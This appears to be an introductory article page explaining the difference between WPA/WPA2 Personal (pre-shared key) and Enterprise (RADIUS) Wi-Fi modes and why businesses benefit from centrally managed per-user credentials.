Home > Articles > Cisco Network Technology > Wireless/Optical/High Speed > Moving to WPA/WPA2-Enterprise Wi-Fi Encryption

Moving to WPA/WPA2-Enterprise Wi-Fi Encryption

Article Description

Wi-Fi networks in businesses (no matter how small) should be using the Enterprise mode of WPA or WPA2 encryption. Eric Geier, the author of Wi-Fi Hotspots: Setting Up Public Wireless Internet Access, shows you how to move from the Personal (PSK) mode to the Enterprise (RADIUS) mode.

As you may know already, Wired Equivalent Privacy (WEP) security is not secure. This first wireless LAN security standard, developed by the IEEE, has been vulnerable to cracking by Wi-Fi hackers for nearly a decade now.

In 2003, the Wi-Fi Alliance released a security standard called Wi-Fi Protected Access. Although the first version (WPA), which uses TKIP/RC4 encryption, has gotten beaten up a bit, is not totally cracked, and can still be very secure.

The second version (WPA2), released in mid-2004, does provide complete security, however, because it fully implements the IEEE 802.11i security standard with CCMP/AES encryption.

In this article, we'll discover the two very different modes of Wi-Fi Protected Access. We'll see how and why you'd want to move from the easy-to-use Personal mode to the Enterprise mode.

Now let's get started!

Two Modes of WPA/WPA2: Personal (PSK) versus Enterprise

Both versions of Wi-Fi Protected Access (WPA/WPA2) can be implemented in either of two modes:

  • Personal or Pre-Shared Key (PSK) Mode: This mode is appropriate for most home networks—but not business networks. You define an encryption passphrase on the wireless router and any other access points (APs). Then the passphrase must be entered by users when connecting to the Wi-Fi network.
  • Though this mode seems very easy to implement, it actually makes properly securing a business network nearly impossible. Unlike with the Enterprise mode, wireless access can't be individually or centrally managed. One passphrase applies to all users. If the global passphrase should need to be changed, it must be manually changed on all the APs and computers. This would be a big headache when you need to change it; for instance, when an employee leaves the company or when any computers are stolen or compromised.

    Unlike with the Enterprise mode, the encryption passphrase is stored on the computers. Therefore, anyone on the computer—whether it be employees or thieves—can connect to the network and also recover the encryption passphrase.

  • Enterprise (EAP/RADIUS) Mode: This mode provides the security needed for wireless networks in business environments. Though more complicated to set up, it offers individualized and centralized control over access to your Wi-Fi network. Users are assigned login credentials they must present when connecting to the network, which can be modified or revoked by administrators at anytime.
  • Users never deal with the actual encryption keys. They are securely created and assigned per user session in the background after a user presents their login credentials. This prevents people from recovering the network key from computers.

2. Introducing 802.1X Authentication and RADIUS Servers | Next Section